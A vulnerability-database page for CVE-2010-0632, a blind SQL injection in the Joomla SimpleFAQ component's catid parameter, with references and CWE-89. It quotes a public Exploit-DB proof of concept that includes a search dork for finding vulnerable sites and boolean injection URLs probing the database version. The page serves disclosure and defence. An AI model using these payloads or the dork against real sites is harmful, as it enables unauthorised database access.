CVE-2010-0632
Description
SQL injection vulnerability in the Parkview Consultants SimpleFAQ (com_simplefaq) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in a display action to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component com_simplefaq - 'catid' Blind SQL Injection
Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability
=========================================================================
###########################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Team : Sec Attack Team
.:. Email : F.Hack@w.cn
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_simplefaq
.:. Script Download: http://www.parkviewconsultants.com/component/option,com_mosipn/page,free/
.:. Bug Type : Blind Sql Injection
.:. Dork : inurl:"com_simplefaq"
#############################################
===[ Exploit ]===
www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70[Blind Injection]&page=1#FAQ5
www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True
www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False
===[ Example ]===
http://server/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True
http://server/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False
#############################################
Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| parkviewconsultants | com_simplefaq | | |
| joomla | joomla\! | | |
References
- http://packetstormsecurity.org/1001-exploits/joomlasimplefaq-sql.txt
- http://www.exploit-db.com/exploits/11294
- http://www.securityfocus.com/bid/38015
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56028
- http://packetstormsecurity.org/1001-exploits/joomlasimplefaq-sql.txt
- http://www.exploit-db.com/exploits/11294
- http://www.securityfocus.com/bid/38015
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56028
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.